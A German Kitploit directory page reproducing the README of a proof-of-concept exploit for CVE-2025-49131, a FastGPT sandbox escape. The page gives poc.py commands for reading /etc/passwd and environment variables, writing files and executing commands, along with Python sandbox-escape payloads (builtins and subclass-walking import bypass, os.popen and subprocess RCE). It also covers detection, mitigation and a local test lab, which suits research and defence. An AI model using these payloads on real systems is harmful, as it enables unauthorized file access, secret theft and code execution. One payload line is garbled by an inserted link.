Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-49131-poc — Proof-of-Concept-Exploit für CVE-2025-49131, eine Sandbox-Escape in FastGPT, die beliebiges Dateilesen/-schreiben, Import-Bypass und Remote-Code-Ausführung über die Sandbox-API ermöglicht. | Kitploit
Tools/GitHubGitHub/wenura17125/cve-2025-49131-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungRemote-Access-ToolContainer-Ausbruch
GitHubwenura17125/cve-2025-49131-poc

cve-2025-49131-poc

Proof-of-Concept-Exploit für CVE-2025-49131, eine Sandbox-Escape in FastGPT, die beliebiges Dateilesen/-schreiben, Import-Bypass und Remote-Code-Ausführung über die Sandbox-API ermöglicht.

Repository anzeigen
7vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-49131 - FastGPT Sandbox Escape PoC

root@kitploit:~
 ███████╗ █████╗ ███████╗████████╗ ██████╗ ██████╗ ████████╗
 ██╔════╝██╔══██╗██╔════╝╚══██╔══╝██╔════╝ ██╔══██╗╚══██╔══╝
 █████╗  ███████║███████╗   ██║   ██║  ███╗██████╔╝   ██║   
 ██╔══╝  ██╔══██║╚════██║   ██║   ██║   ██║██╔═══╝    ██║   
 ██║     ██║  ██║███████║   ██║   ╚██████╔╝██║        ██║   
 ╚═╝     ╚═╝  ╚═╝╚══════╝   ╚═╝    ╚═════╝ ╚═╝        ╚═╝   
                                                            
 ███████╗ █████╗ ███╗   ██╗██████╗ ██████╗  ██████╗ ██╗  ██╗
 ██╔════╝██╔══██╗████╗  ██║██╔══██╗██╔══██╗██╔═══██╗╚██╗██╔╝
 ███████╗███████║██╔██╗ ██║██║  ██║██████╔╝██║   ██║ ╚███╔╝ 
 ╚════██║██╔══██║██║╚██╗██║██║  ██║██╔══██╗██║   ██║ ██╔██╗ 
 ███████║██║  ██║██║ ╚████║██████╔╝██████╔╝╚██████╔╝██╔╝ ██╗
 ╚══════╝╚═╝  ╚═╝╚═╝  ╚═══╝╚═════╝ ╚═════╝  ╚═════╝ ╚═╝  ╚═╝
                                                            
 ███████╗███████╗ ██████╗ █████╗ ██████╗ ███████╗           
 ██╔════╝██╔════╝██╔════╝██╔══██╗██╔══██╗██╔════╝           
 █████╗  ███████╗██║     ███████║██████╔╝█████╗             
 ██╔══╝  ╚════██║██║     ██╔══██║██╔═══╝ ██╔══╝             
 ███████╗███████║╚██████╗██║  ██║██║     ███████╗           
 ╚══════╝╚══════╝ ╚═════╝╚═╝  ╚═╝╚═╝     ╚══════╝           
                                                            
        ╔═══════════════════════════════════════╗
        ║     CVE-2025-49131 | CVSS 6.3        ║
        ║   FastGPT Sandbox Container Escape   ║
        ║      Betroffen: < v4.9.11            ║
        ╚═══════════════════════════════════════╝

🎯 Schwachstellenübersicht

FeldWert
CVE-IDCVE-2025-49131
CVSS-Score6.3 (Mittel)
CVSS-VektorAV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
SchwachstellentypSandbox Escape
Betroffene SoftwareFastGPT (fastgpt-sandbox Container)
Betroffene Versionen< 4.9.11
Gepatchte Version4.9.11+
Offenlegungsdatum9. Juni 2025

⚠️ Haftungsausschluss

Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und Bildungszwecke bestimmt.

  • Testen Sie nur Systeme, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung haben.
  • Befolgen Sie die Grundsätze der verantwortungsvollen Offenlegung.
  • Halten Sie alle geltenden Gesetze und Vorschriften ein.

📖 Beschreibung

CVE-2025-49131 ist eine Sandbox-Escape-Schwachstelle im fastgpt-sandbox-Container von FastGPT. Die Schwachstelle besteht aufgrund von:

  • Unzureichenden Isolierungsmechanismen – Die Sandbox schränkt Python-Builtins nicht richtig ein.
  • Zu permissiven Systemaufrufen – Gefährliche Syscalls werden nicht blockiert.
  • Unzureichenden Code-Ausführungsbeschränkungen – Importbeschränkungen können umgangen werden.

Auswirkungen

Eine erfolgreiche Ausnutzung erlaubt einem Angreifer Folgendes:

  • ✅ Beliebige Dateien lesen – Zugriff auf /etc/passwd, Konfigurationsdateien, Geheimnisse
  • ✅ Beliebige Dateien schreiben – Systemdateien ändern, Schadcode einschleusen
  • ✅ Python-Importbeschränkungen umgehen – Module wie os, subprocess importieren
  • ✅ Potenzielle RCE – Systembefehle über importierte Module ausführen

🚀 Schnellstart

root@kitploit:~
# Dieses Repository klonen
git clone https://github.com/Wenura17125/cve-2025-49131-poc.git
cd cve-2025-49131-poc

# Abhängigkeiten installieren
pip install -r requirements.txt

# Schwachstellenerkennung ausführen
python poc.py --target http://localhost:3001 --detect

# Eine Datei lesen
python poc.py --target http://localhost:3001 --read /etc/passwd

# RCE versuchen
python poc.py --target http://localhost:3001 --rce "id"

🔧 Verwundbare Umgebung einrichten

root@kitploit:~
# Verwundbare und gepatchte Container starten
docker-compose up -d

# Verwundbare Sandbox auf Port 3001
# Gepatchte Sandbox auf Port 3002

💻 Verwendung

Erkennungsmodus (nicht destruktiv)

root@kitploit:~
python poc.py --target http://localhost:3001 --detect -v

Beliebige Dateien lesen

root@kitploit:~
python poc.py --target http://localhost:3001 --read /etc/passwd
python poc.py --target http://localhost:3001 --read /proc/self/environ

Dateien schreiben

root@kitploit:~
python poc.py --target http://localhost:3001 --write /tmp/pwned --content "CVE-2025-49131"

Import umgehen

root@kitploit:~
python poc.py --target http://localhost:3001 --import os
python poc.py --target http://localhost:3001 --import subprocess

Umgebungsvariablen

root@kitploit:~
python poc.py --target http://localhost:3001 --env

Remote-Code-Ausführung

root@kitploit:~
python poc.py --target http://localhost:3001 --rce "whoami"
python poc.py --target http://localhost:3001 --rce "cat /etc/passwd"

Alle Optionen

root@kitploit:~
python poc.py --help

📁 Projektstruktur

root@kitploit:~
cve-2025-49131-poc/
├── poc.py                # Haupt-Exploit-Skript
├── payloads.py           # Payload-Generator-Bibliothek
├── docker-compose.yml    # Testumgebung
├── requirements.txt      # Python-Abhängigkeiten
├── README.md             # Diese Datei
└── tests/
    └── test_exploit.py   # Automatisierte Tests

🔬 Technische Einzelheiten

Grundursache der Schwachstelle

Die FastGPT-Sandbox ist dazu ausgelegt, benutzereingereichten Code in einer isolierten Umgebung auszuführen. Die Isolierungsmechanismen sind jedoch unzureichend:

  1. Python-__builtins__-Zugriff – Die Sandbox schränkt den Zugriff auf eingebaute Funktionen wie open(), __import__() usw. nicht richtig ein.

  2. Syscall-Filterung – Die Liste der erlaubten Syscalls enthält gefährliche Aufrufe, die Dateisystemzugriff ermöglichen.

  3. Umgehung von Importbeschränkungen – Es existieren mehrere Techniken, um Modul-Importbeschränkungen zu umgehen.

Exploit-Ablauf

root@kitploit:~
┌─────────────────────────────────────────────┐
│ 1. Schadcode an die Sandbox-API senden      │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 2. Sandbox-Beschränkungen umgehen mit:      │
│    - __builtins__-Manipulation              │
│    - Subclass-Walking                       │
│    - Import-Bypass-Techniken                │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 3. Zugriff erlangen auf:                    │
│    - Dateisystem (Lesen/Schreiben)          │
│    - os/subprocess-Module                   │
│    - Umgebungsvariablen                     │
└─────────────────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────┐
│ 4. Auswirkungen:                            │
│    - Datenextraktion                        │
│    - Code-Injection                         │
│    - Remote-Befehlsausführung               │
└─────────────────────────────────────────────┘

Beispiel-Payloads

Datei lesen:

root@kitploit:~
open('/etc/passwd', 'r').read()
__builtins__.open('/etc/passwd').read()

Import umgehen:

root@kitploit:~
__import__('os')
__builtins__.__import__('os')
[x for x in ().__class__.__base__.__subclasses__() 
 if x.__name__=='catch_warnings'][0]()._module.__builtins__['__import__'](https://github.com/wenura17125/cve-2025-49131-poc/blob/main/%27os%27)

RCE (Remote Code Execution):

root@kitploit:~
__import__('os').popen('id').read()
__import__('subprocess').check_output('id', shell=True)

🛡️ Erkennung und Abhilfe

Erkennung

Achten Sie in den Sandbox-Logs auf verdächtige Aktivitäten:

  • Versuche, auf /etc/passwd, /etc/shadow zuzugreifen
  • Aufrufe von __builtins__, __import__
  • Nutzung von Subprocess- oder os-Modul
  • Ungewöhnliche Lese-/Schreiboperationen auf Dateien

Abhilfe

  1. FastGPT aktualisieren auf Version 4.9.11 oder höher
  2. Netzwerkisolierung – Netzwerkzugriff des Sandbox-Containers einschränken
  3. Ressourcenlimits – CPU-/Arbeitsspeicherlimits für Container anwenden
  4. Überwachung – Protokollierung und Alarmierung für Sandbox-Aktivitäten implementieren

📚 Referenzen

  • NVD - CVE-2025-49131
  • FastGPT GitHub
  • GitHub-Sicherheitshinweis
  • FastGPT-Dokumentation

⏱️ Zeitplan

DatumEreignis
2025-??-??Schwachstelle entdeckt
2025-??-??Anbieter benachrichtigt
2025-06-??Patch veröffentlicht (v4.9.11)
2025-06-09Öffentliche Offenlegung

📄 Lizenz

Dieses Projekt dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Verantwortungsvoll nutzen.


Erstellt für Sicherheitsforschungszwecke. Holen Sie stets die entsprechende Genehmigung ein, bevor Sie Tests durchführen.

Tool herunterladen